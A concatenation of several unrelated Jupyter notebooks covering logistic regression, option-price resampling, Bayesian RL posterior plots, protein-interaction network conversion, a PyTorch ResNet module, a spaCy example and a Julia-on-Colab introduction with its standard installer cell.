df
plt.scatter(df["age"],df["bought_insurance"], marker = "+", color = "red")
# ### 1.0: Those who bought the insurance
# ### 0.0: Those who did not buy the insurance
# # Goal: Train 80% of the dataset and Test on the other 20%
# ## Split the dataset into Training set and Testing set
from sklearn.model_selection import train_test_split
# X-Axis: x_train, x_test
#
# Y-Axis: y_train, x_test
# ### test_size = 0.2 or 20%
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2)
# ### split in random format
print(len(x_train))
x_train
print(len(x_test))
x_test
y_train
y_test
# ## Notice how the dataset is split randomly:
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2)
x_train
x_test
y_train
y_test
# ## Fix the randomness of the split :
df
x_train,x_test,y_train,y_test = train_test_split(df[["age"]],df.bought_insurance, test_size = 0.2, random_state = 10)
x_train
x_test
y_train
y_test
from sklearn.linear_model import LogisticRegression
model = LogisticRegression()
model.fit(x_train,y_train)
# ### Now make predictions:
# ### age = 52
model.predict([[52]])
# ### age = 25
model.predict([[25]])
model.predict([[26]])
model.predict([[24]])
model.predict([[22]])
model.predict([[23]])
model.predict([[27]])
# ### age = 19
model.predict([[19]])
# # Likelihood of x_test:
model.predict_proba(x_test)
model.score(x_test,y_test) #Here it is almost 100
# # Based on our dataset, the conclusion is that a person is likely to buy the insurance is he/she is above 25 , somewhat closer to our value of above 30
# # Pandas : range for freq = business days
rng = pd.date_range(start = "07-01-2019", end = "07-30-2019", freq = "B")
rng
rng_date = pd.date_range(start = "07-01-2019", end = "07-30-2019", freq = "D")
rng_date
rng_date.difference(rng)
|
Data-Science-HYD-2k19/Day-based/Day 48.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.8.5 32-bit
# name: python_defaultSpec_1598286770093
# ---
import pandas as pd
data = pd.read_excel("NIFTY25JUN2010000PE.xlsx", parse_dates=[['Date', 'Time']])
#convert df index to DataTimeIndex
data.index = pd.to_datetime(data['Date_Time'] )
data.isnull().sum()
data.head()
#downsample and aggregate
Resampled_Data = data.resample('15T').mean()
Resampled_Data.head(40)
# ### Resampling Successful!!
# Getting NaN values for the rows missing in default sheet.
#
# Cleaning NaN Rows
CnR_Data = Resampled_Data.dropna(axis = 0)
# Exporting Cleaned and Resampled Sheet
CnR_Data.to_excel("Cleaned_and_Resampled_Data.xlsx")
# ## Getting data date by date
df = CnR_Data
df.shape
df.head(10)
df.columns
# + tags=[]
# Retrieved all the dates used in the dataframe
dates = sorted(list(set(df.index.date)))
# -
def calc(op, high, low, close):
n = len(op)
curr = 1
prev = 0
shortpos = -1
short = False
while curr<n:
if low[curr]<low[prev]:
short = True
shortpos = curr
break
prev = curr
curr+=1
if short:
while curr<n:
# print(high[shortpos],high[curr],high[shortpos]<high[curr])
if high[shortpos]<high[curr]:
# print(close[curr], op[0])
return close[curr] - op[0]
curr+=1
# print(short, shortpos, curr, close[-1], op[0])
# Below line runs iff there is no short position or exit condition found
return close[-1] - op[0]
# + tags=[]
for date in dates[0:]:
data = df.loc[str(date)]
# Size of data
op, high, low, close = [], [], [], []
#print(data.shape)
for i in range(data.shape[0]):
op.append((data.iloc[i])[0])
high.append((data.iloc[i])[1])
low.append((data.iloc[i])[2])
close.append((data.iloc[i])[3])
pNl = calc(op, high, low, close)
if pNl<0:
print(f"{date}: Loss \t{-round(pNl,2)}")
elif pNl>0:
print(f"{date}: Profit \t{round(pNl,2)}")
else:
print(f"{date}: No Profit or Loss")
print("________________________________")
# -
|
Screener.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import os
import sys
sys.path.append('/'.join(os.getcwd().split('/')[:-1]))
from Agents import QLearningAgent, BayesianQAgent, PSRLAgent, MomentMatchingAgent, UbeNoUnrollAgent
from Environments import DeepSea, WideNarrow, PriorMDP
from utils import solve_tabular_continuing_PI, run_experiment, run_oracle_experiment, load_agent
from tqdm import tqdm_notebook as tqdm
# For saving figures and agents
if not os.path.exists('results'): os.mkdir('results')
if not os.path.exists('results/figures'): os.mkdir('results/figures')
if not os.path.exists('results/agent_logs'): os.mkdir('results/agent_logs')
fig_loc = 'results/figures/'
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
plt.rc('legend', fontsize=16)
plt.rc('figure', titlesize=50)
# -
# # Environment constants
# +
# PriorMDP constants
num_time_steps = 5000
save_every = num_time_steps // 100
plot_time = 5000
Ns = 4
Na = 2
env_params = {'Ns' : Ns,
'Na' : Na,
'kappa' : 1.0,
'mu0' : 0.0,
'lamda' : 1.0,
'alpha' : 4.0,
'beta' : 4.0,
'seed' : 1}
# Define environment
environment = PriorMDP(env_params)
# Number of PI steps and maximum buffer length (PSRL, UBE and MM only)
max_iter = 6 * Ns
max_buffer_length = Ns + 1
# -
# # Bayesian Q-Learning
# Agent parameters
agent_params = {'gamma' : 0.9,
'mu0' : 0.0,
'lamda' : 4.0,
'alpha' : 3.0,
'beta' : 3.0,
'num_mixture_samples' : 1000,
'sa_list' : environment.sa_list()}
# +
# for seed in tqdm(range(10)):
# # Define agent
# agent = BayesianQAgent(agent_params)
# # Run experiment
# run_experiment(environment=environment,
# agent=agent,
# seed=seed,
# num_time_steps=num_time_steps,
# max_buffer_length=1,
# save_every=save_every)
# +
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, BayesianQAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
agent.Qpost = agent.Qpost_log[T]
for s in range(Ns):
samples.append([])
for i in range(500):
environment.s = s
samples[-1].append(agent.take_action(s, 0, reduce_max=False)[0])
samples = np.array(samples).swapaxes(0, 1)
optimal_actions = np.argmax(Q, axis=-1)
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
plt.subplot(1, Ns, s + 1)
plt.scatter(samples[:, s, 0], samples[:, s, 1], color='purple', marker='x', s=12)
leg[0] = plt.scatter(samples[:, s, 0].mean(),
samples[:, s, 1].mean(),
color='red',
marker='x',
s=500,
linewidth=3)
leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
plt.xlim([0, 6])
plt.ylim([0, 6])
xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
if optimal_actions[s] == 0:
xlabel += ' (opt.)'
else:
ylabel += ' (opt.)'
plt.xlabel(xlabel, fontsize=24)
plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'BQL samples PriorMDP ($t$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
mu0, lamda, alpha, beta = agent.mu0, agent.lamda, agent.alpha, agent.beta
save_name = 'bql-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # PSRL
# Agent parameters
agent_params = {'gamma' : 0.9,
'kappa' : 1.0,
'mu0' : 0.0,
'lamda' : 4.0,
'alpha' : 3.0,
'beta' : 3.0,
'max_iter' : max_iter,
'sa_list' : environment.sa_list()}
# +
# for seed in tqdm(range(10)):
# # Define agent
# agent = PSRLAgent(agent_params)
# # Run experiment
# run_experiment(environment=environment,
# agent=agent,
# seed=seed,
# num_time_steps=num_time_steps,
# max_buffer_length=max_buffer_length,
# save_every=save_every)
# +
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, PSRLAgent(agent_params), seed=0)
samples = []
T = plot_time // save_every
agent.Ppost = agent.Ppost_log[T]
agent.Rpost = agent.Rpost_log[T]
for i in range(500):
environment.s = s
P, R = agent.sample_posterior()
Q_ = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)[1]
samples.append(Q_)
samples = np.array(samples)
optimal_actions = np.argmax(Q, axis=-1)
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
plt.subplot(1, Ns, s + 1)
plt.scatter(samples[:, s, 0], samples[:, s, 1], color='orange', marker='x', s=12)
leg[0] = plt.scatter(samples[:, s, 0].mean(),
samples[:, s, 1].mean(),
color='red',
marker='x',
s=500,
linewidth=3)
leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
plt.xlim([0, 6])
plt.ylim([0, 6])
xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
if optimal_actions[s] == 0:
xlabel += ' (opt.)'
else:
ylabel += ' (opt.)'
plt.xlabel(xlabel, fontsize=24)
plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'PSRL samples PriorMDP ($t$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
mu0, lamda, alpha, beta = agent.mu0, agent.lamda, agent.alpha, agent.beta
save_name = 'psrl-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # UBE
# Agent parameters
agent_params = {'gamma' : 0.9,
'kappa' : 1.0,
'mu0' : 0.0,
'lamda' : 4.0,
'alpha' : 3.0,
'beta' : 3.0,
'Rmax' : environment.get_mean_P_and_R()[1].max(),
'max_iter' : max_iter,
'zeta' : 1.0,
'num_dyn_samples' : 100,
'sa_list' : environment.sa_list()}
# +
# for seed in tqdm(range(10)):
# # Define agent
# agent = UbeNoUnrollAgent(agent_params)
# # Run experiment
# run_experiment(environment=environment,
# agent=agent,
# seed=seed,
# num_time_steps=num_time_steps,
# max_buffer_length=max_buffer_length,
# save_every=save_every)
# +
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, UbeNoUnrollAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
Qmu = agent.Qmu_log[T]
Qvar = agent.Qvar_log[T]
for s in range(Ns):
samples.append([])
for i in range(500):
environment.s = s
samples[-1].append(np.random.normal(Qmu[s, :], agent.zeta * Qvar[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
plt.subplot(1, Ns, s + 1)
plt.scatter(samples[:, s, 0], samples[:, s, 1], color='green', marker='x', s=12)
leg[0] = plt.scatter(samples[:, s, 0].mean(),
samples[:, s, 1].mean(),
color='red',
marker='x',
s=500,
linewidth=3)
leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
plt.xlim([0, 6])
plt.ylim([0, 6])
xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
if optimal_actions[s] == 0:
xlabel += ' (opt.)'
else:
ylabel += ' (opt.)'
plt.xlabel(xlabel, fontsize=24)
plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'UBE samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'ube-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # UBE
# Agent parameters
agent_params = {'gamma' : 0.9,
'kappa' : 1.0,
'mu0' : 0.0,
'lamda' : 4.0,
'alpha' : 3.0,
'beta' : 3.0,
'Rmax' : environment.get_mean_P_and_R()[1].max(),
'max_iter' : max_iter,
'zeta' : 0.1,
'num_dyn_samples' : 100,
'sa_list' : environment.sa_list()}
# +
# for seed in tqdm(range(10)):
# # Define agent
# agent = UbeNoUnrollAgent(agent_params)
# # Run experiment
# run_experiment(environment=environment,
# agent=agent,
# seed=seed,
# num_time_steps=num_time_steps,
# max_buffer_length=max_buffer_length,
# save_every=save_every)
# +
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, UbeNoUnrollAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
Qmu = agent.Qmu_log[T]
Qvar = agent.Qvar_log[T]
for s in range(Ns):
samples.append([])
for i in range(1000):
environment.s = s
samples[-1].append(np.random.normal(Qmu[s, :], agent.zeta * Qvar[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
plt.subplot(1, Ns, s + 1)
plt.scatter(samples[:, s, 0], samples[:, s, 1], color='green', marker='x', s=12)
leg[0] = plt.scatter(samples[:, s, 0].mean(),
samples[:, s, 1].mean(),
color='red',
marker='x',
s=500,
linewidth=3)
leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
plt.xlim([0, 6])
plt.ylim([0, 6])
xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
if optimal_actions[s] == 0:
xlabel += ' (opt.)'
else:
ylabel += ' (opt.)'
plt.xlabel(xlabel, fontsize=24)
plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'UBE samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'ube-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
# # Moment Matching
# Agent constants
agent_params = {'gamma' : 0.9,
'kappa' : 1.0,
'mu0' : 0.0,
'lamda' : 4.0,
'alpha' : 3.0,
'beta' : 3.0,
'max_iter' : max_iter,
'zeta' : 1.0,
'num_dyn_samples' : 100,
'sa_list' : environment.sa_list()}
# +
# for seed in tqdm(range(10)):
# # Define agent
# agent = MomentMatchingAgent(agent_params)
# # Run experiment
# run_experiment(environment=environment,
# agent=agent,
# seed=seed,
# num_time_steps=num_time_steps,
# max_buffer_length=max_buffer_length,
# save_every=save_every)
# +
P, R = environment.get_mean_P_and_R()
pi, Q = solve_tabular_continuing_PI(P, R, gamma=0.9, max_iter=max_iter)
agent = load_agent(environment, MomentMatchingAgent(agent_params), seed=0)
samples = []
leg_names = ['Sample mean',
'True $Q^*_{\\mathbf{s}, \\mathbf{a}}$']
leg = [None] * 2
T = plot_time // save_every
mu = agent.mu_log[T]
var = agent.var_log[T]
for s in range(Ns):
samples.append([])
for i in range(250):
environment.s = s
samples[-1].append(np.random.normal(mu[s, :], agent.zeta * var[s, :]**0.5))
samples = np.array(samples).swapaxes(0, 1)
fig = plt.figure(figsize=(15, 5))
for s in range(Ns):
plt.subplot(1, Ns, s + 1)
plt.scatter(samples[:, s, 0], samples[:, s, 1], color='deepskyblue', marker='x', s=12)
leg[0] = plt.scatter(samples[:, s, 0].mean(),
samples[:, s, 1].mean(),
color='red',
marker='x',
s=500,
linewidth=3)
leg[1] = plt.scatter(Q[s, 0], Q[s, 1], color='black', marker='x', s=500, linewidth=3)
plt.plot(np.linspace(0, 6, 2), np.linspace(0, 6, 2), '--', color='black')
plt.xlim([0, 6])
plt.ylim([0, 6])
xlabel = '$\mu_{z_{' + str(s + 1) + ', 1}}$'
ylabel = '$\mu_{z_{' + str(s + 1) + ', 2}}$'
if optimal_actions[s] == 0:
xlabel += ' (opt.)'
else:
ylabel += ' (opt.)'
plt.xlabel(xlabel, fontsize=24)
plt.ylabel(ylabel, fontsize=24)
plt.tight_layout()
plt.figlegend(leg, leg_names, loc = 'lower center', ncol=2, labelspacing=0., fontsize=20)
title = 'MM samples PriorMDP ($t$ = {}, $\zeta$ = {}, $N_s$ = {}, $N_a$ = {})'
plt.suptitle(title.format(plot_time, agent.zeta, Ns, Na), fontsize=26)
fig.subplots_adjust(top=0.825, bottom=0.35)
mu0, lamda, alpha, beta, zeta = agent.mu0, agent.lamda, agent.alpha, agent.beta, agent.zeta
save_name = 'mm-{}-{}-{}-{}-{}-scatter-priormdp-{}-{}-{}'.format(mu0, lamda, alpha, beta, zeta, Ns, Na, plot_time)
save_name = save_name.replace('.', '_')
plt.savefig(fig_loc + save_name + '.pdf', bbox_inches='tight')
plt.show()
# -
|
code/experiments/plot-correlations-priormdp.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
from network_evaluation_tools import gene_conversion_tools as gct
from network_evaluation_tools import data_import_tools as dit
import pandas as pd
import itertools
import time
# ## Load InBio_Map Raw Data
# #### Source: https://www.intomics.com/inbio/map/#downloads
# Downloaded: November 30, 2016
# Last Updated: September 12, 2016
# Note about scoring: According to the supplement of the associated paper (<NAME>, et al. A scored human protein–protein interaction network to catalyze genomic interpretation. Nature Methods 14, 61–64 (2017) doi:10.1038/nmeth.4083), column 15 (index=14) should correspond to the confidence score of the edge. This column has 2 values, the confidence score and initial score. We will use the confidence score as it is a corrected version of the initial score calculated, indicating confidence that a particular interaction is real.
wd = '/cellar/users/jkhuang/Data/Projects/Network_Analysis/Data/'
InBio_Map_Raw = pd.read_csv(wd+'Network_Data_Raw/InBio_Map_core_2016_09_12/core.psimitab',sep='\t', header=-1)
print 'Raw edge count in InBio_Map:', len(InBio_Map_Raw)
InBio_Map_Human_Only = InBio_Map_Raw[(InBio_Map_Raw[9]=='taxid:9606(Homo sapiens)') & (InBio_Map_Raw[10]=='taxid:9606(Homo sapiens)')]
print 'Human-Human only interactions in InBioMap:', len(InBio_Map_Human_Only)
# Extract gene list
InBio_Map_Human_Genes = list(set(InBio_Map_Human_Only[0]).union(set(InBio_Map_Human_Only[1])))
InBio_Map_Human_Genes = [str(gene) for gene in InBio_Map_Human_Genes]
# ## Convert Genes
# Construct list of genes to be submitted to MyGene.Info API
query_string, valid_genes, invalid_genes = gct.query_constructor(InBio_Map_Human_Genes)
# +
# Set scopes (gene naming systems to search)
scopes = "uniprot"
# Set fields (systems from which to return gene names from)
fields = "symbol, entrezgene"
# -
# Query MyGene.Info
match_list = gct.query_batch(query_string, scopes=scopes, fields=fields)
print len(match_list), 'Matched query results'
match_table_trim, query_to_symbol, query_to_entrez = gct.construct_query_map_table(match_list, valid_genes)
# ## Construct Converted Network
query_edgelist = InBio_Map_Human_Only[[0, 1, 14]].values.tolist()
query_edgelist_fmt = [[edge[0].split(':')[1], edge[1].split(':')[1], float(edge[2].split('|')[0])] for edge in query_edgelist]
# %%time
# Convert weighted edge list
InBioMap_edgelist_symbol = gct.convert_edgelist(query_edgelist_fmt, query_to_symbol, weighted=True)
# Filter converted edge list
InBioMap_edgelist_symbol_filt = gct.filter_converted_edgelist(InBioMap_edgelist_symbol, weighted=True)
# Write network to file
gct.write_edgelist(InBioMap_edgelist_symbol_filt, wd+'Network_SIFs_Symbol/InBioMap_Symbol.sif', binary=False)
# Create filtered network
InBioMap90_edgelist = dit.filter_weighted_network_sif(wd+'Network_SIFs_Symbol/InBioMap_Symbol.sif', nodeA_col=0, nodeB_col=1, score_col=2,
q=0.9, delimiter='\t', verbose=True, save_path=wd+'Network_SIFs_Symbol/InBioMap90_Symbol.sif')
# The filter function didn't work here because the max value makes up >90% of the edges.
# We need to filter but keep all max edges instead
InBioMap_edgelist = pd.DataFrame(InBioMap_edgelist_symbol_filt, columns=['NodeA', 'NodeB', 'edgeScore'])
q_score = InBioMap_edgelist['edgeScore'].quantile(0.9)
InBioMap_edgelist_filt = InBioMap_edgelist[InBioMap_edgelist['edgeScore']>=q_score]
print InBioMap_edgelist_filt.shape[0], '/', InBioMap_edgelist.shape[0], 'edges kept, ', float(InBioMap_edgelist_filt.shape[0])/InBioMap_edgelist.shape[0]
# Keeping all edges where the score == 1, it's a top 75% network, we will save this
InBioMap_edgelist_filt[['NodeA', 'NodeB']].to_csv(wd+'Network_SIFs_Symbol/InBioMap75_Symbol.sif', sep='\t', index=False, header=False)
|
Network Processing Notebooks/InBioMap Processing.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# default_exp architecture.common
# +
#export
import torch.nn as nn
class ResBlock(nn.Module):
def __init__(self, n_feats, kernel_size):
super(ResBlock, self).__init__()
self.conv1 = nn.Conv2d(n_feats, n_feats, kernel_size, padding=(kernel_size // 2))
self.activation = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(n_feats, n_feats, kernel_size, padding=(kernel_size // 2))
def forward(self, input_):
residual = self.conv1(input_)
residual = self.activation(residual)
residual = self.conv2(residual)
output = input_ + residual
return output
class ResNet(nn.Module):
def __init__(self, in_channels, out_channels, n_feats=64, kernel_size=5, n_resblocks=19):
super(ResNet, self).__init__()
self.input_layer = nn.Conv2d(in_channels, n_feats, kernel_size, padding=(kernel_size // 2))
self.blocks = nn.ModuleList([])
for _ in range(n_resblocks):
self.blocks.append(ResBlock(n_feats, kernel_size))
self.output_layer = nn.Conv2d(n_feats, out_channels, kernel_size, padding=(kernel_size // 2))
def forward(self, input_):
x = self.input_layer(input_)
for block in self.blocks:
x = block(x)
output = self.output_layer(x)
return output
class UpConv2D(nn.Module):
def __init__(self, in_channels=3, out_channels=3, kernel_size=5, ratio=2):
super(UpConv2D, self).__init__()
self.conv = nn.Conv2d(in_channels, out_channels*(ratio**2), kernel_size, padding=(kernel_size // 2))
self.upscale = nn.PixelShuffle(ratio)
def forward(self, input_):
x = self.conv(input_)
output = self.upscale(x)
return output
# -
from nbdev.export import *
notebook2script()
|
nbs/02_architecture_common.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import spacy
text1 = "Children shouldn't drink a sugary drink before bed."
nlp = spacy.load('en')
doc = nlp(text1)
for token in doc:
print(token.text , token.pos_ , token.tag_)
|
nlp-with-python/advanced_ nlp tasks with spacy.ipynb
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia
# language: julia
# name: julia
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/Grupo-de-Pesquisa-em-Macro-Aplicada/Ibmec-Pesquisa-Macro-Aplicada/blob/master/QM_IntroJulia.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="FROvo3UdM-FY"
# + id="GIeFXS0F0zww"
# %%shell
set -e
#---------------------------------------------------#
JULIA_VERSION="1.4.2" # any version ≥ 0.7.0
JULIA_PACKAGES="IJulia BenchmarkTools PyCall PyPlot"
JULIA_PACKAGES_IF_GPU="CUDA"
JULIA_NUM_THREADS=4
#---------------------------------------------------#
if [ -n "$COLAB_GPU" ] && [ -z `which julia` ]; then
# Install Julia
JULIA_VER=`cut -d '.' -f -2 <<< "$JULIA_VERSION"`
echo "Installing Julia $JULIA_VERSION on the current Colab Runtime..."
BASE_URL="https://julialang-s3.julialang.org/bin/linux/x64"
URL="$BASE_URL/$JULIA_VER/julia-$JULIA_VERSION-linux-x86_64.tar.gz"
wget -nv $URL -O /tmp/julia.tar.gz # -nv means "not verbose"
tar -x -f /tmp/julia.tar.gz -C /usr/local --strip-components 1
rm /tmp/julia.tar.gz
# Install Packages
if [ "$COLAB_GPU" = "1" ]; then
JULIA_PACKAGES="$JULIA_PACKAGES $JULIA_PACKAGES_IF_GPU"
fi
for PKG in `echo $JULIA_PACKAGES`; do
echo "Installing Julia package $PKG..."
julia -e 'using Pkg; pkg"add '$PKG'; precompile;"'
done
# Install kernel and rename it to "julia"
echo "Installing IJulia kernel..."
julia -e 'using IJulia; IJulia.installkernel("julia", env=Dict(
"JULIA_NUM_THREADS"=>"'"$JULIA_NUM_THREADS"'"))'
KERNEL_DIR=`julia -e "using IJulia; print(IJulia.kerneldir())"`
KERNEL_NAME=`ls -d "$KERNEL_DIR"/julia*`
mv -f $KERNEL_NAME "$KERNEL_DIR"/julia
echo ''
echo "Successfully installed `julia -v`!"
echo "Please reload this page (press Ctrl+R, ⌘+R, or the F5 key) then"
echo "jump to the 'Checking the Installation' section."
fi
# + id="EEzvvzCl1i0F" colab={"base_uri": "https://localhost:8080/"} outputId="c2a05535-00d3-469a-b7fd-eccaff171f10"
versioninfo()
# + [markdown] id="Et7_NZkYKYi3"
# Pretty similar, right? But notice the small differences:
#
# |Julia|Python
# |-----|------
# |`function` | `def`
# |`for i in X`<br /> `...`<br />`end` | `for i in X:`<br /> `...`
# |`1:n` | `range(1, n+1)`
# |`cond ? a : b` | `a if cond else b`
# |`2i + 1` | `2 * i + 1`
# |`4s` | `return 4 * s`
# |`println(a, b)` | `print(a, b, sep="")`
# |`print(a, b)` | `print(a, b, sep="", end="")`
# |`"$p"` | `f"{p}"`
# |`"$(p - π)"` | `f"{p - math.pi}"`
#
# This example shows that:
# * Julia can be just as concise and readable as Python.
# * Indentation in Julia is _not_ meaningful like it is in Python. Instead, blocks end with `end`.
# * Many math features are built in Julia and need no imports.
# * There's some mathy syntactic sugar, such as `2i` (but you can write `2 * i` if you prefer).
# * In Julia, the `return` keyword is optional at the end of a function. The result of the last expression is returned (`4s` in this example).
# * Julia loves Unicode and does not hesitate to use Unicode characters like `π`. However, there are generally plain-ASCII equivalents (e.g., `π == pi`)
# + [markdown] id="jAZiukdktw1w"
# # Ola
# + id="iHoy3b5etW7Y" colab={"base_uri": "https://localhost:8080/"} outputId="df054e70-5067-43fe-bed1-1b77610e3832"
print("Ola Mundo!")
# + [markdown] id="j67REsS5tyxz"
# # Operacoes Artimeticas
# + id="gBCD-w3jt1Ks" colab={"base_uri": "https://localhost:8080/"} outputId="62a94b92-3ca1-4d50-9fc3-a4f57689b557"
x = 1
y = 2
s = s+1
s
# + [markdown] id="ro8n4VSPt8Su"
# # Funcoes
# + id="iJltitALt-UE" colab={"base_uri": "https://localhost:8080/"} outputId="cfc327cc-94e1-4598-8832-3cb899cced04"
function somar(x,y)
s = x+y
return s
end
# + colab={"base_uri": "https://localhost:8080/"} id="oSstYCFySr6X" outputId="70aa6e83-5eef-4e44-d0f5-c4ee0e9cc0c1"
r= somar(1,2)
r
# + [markdown] id="Xcq7FYziKl3h"
#
#
# |Julia|Python
# |-----|------
# |`if cond1`<br /> `...`<br/>`elseif cond2`<br /> `...`<br/>`else`<br /> `...`<br/>`end` |`if cond1:`<br /> `...`<br/>`elif cond2:`<br /> `...`<br/>`else:`<br /> `...`
# |`&&` | `and`
# |`\|\|` | `or`
# |`!` | `not`
# |`⊻` (type `\xor<tab>`) | `^`
# |`true` | `True`
# |`false` | `False`
# |`cond && f()` | `if cond: f()`
# |`cond \|\| f()` | `if not cond: f()`
# |`for i in 1:5 ... end` | `for i in range(1, 6): ...`
# |`for i in 1:5, j in 1:6 ... end` | `from itertools import product`<br />`for i, j in product(range(1, 6), range(1, 7)):`<br /> `...`
# |`while cond ... end` | `while cond: ...`
# |`continue` | `continue`
# |`break` | `break`
#
# + [markdown] id="a189KYLzusIR"
# # Condicionais
# + id="_8owNy9juuNa" colab={"base_uri": "https://localhost:8080/"} outputId="1c030879-0645-4495-a568-b132e3490dd5"
function aprovacao(nota, freq)
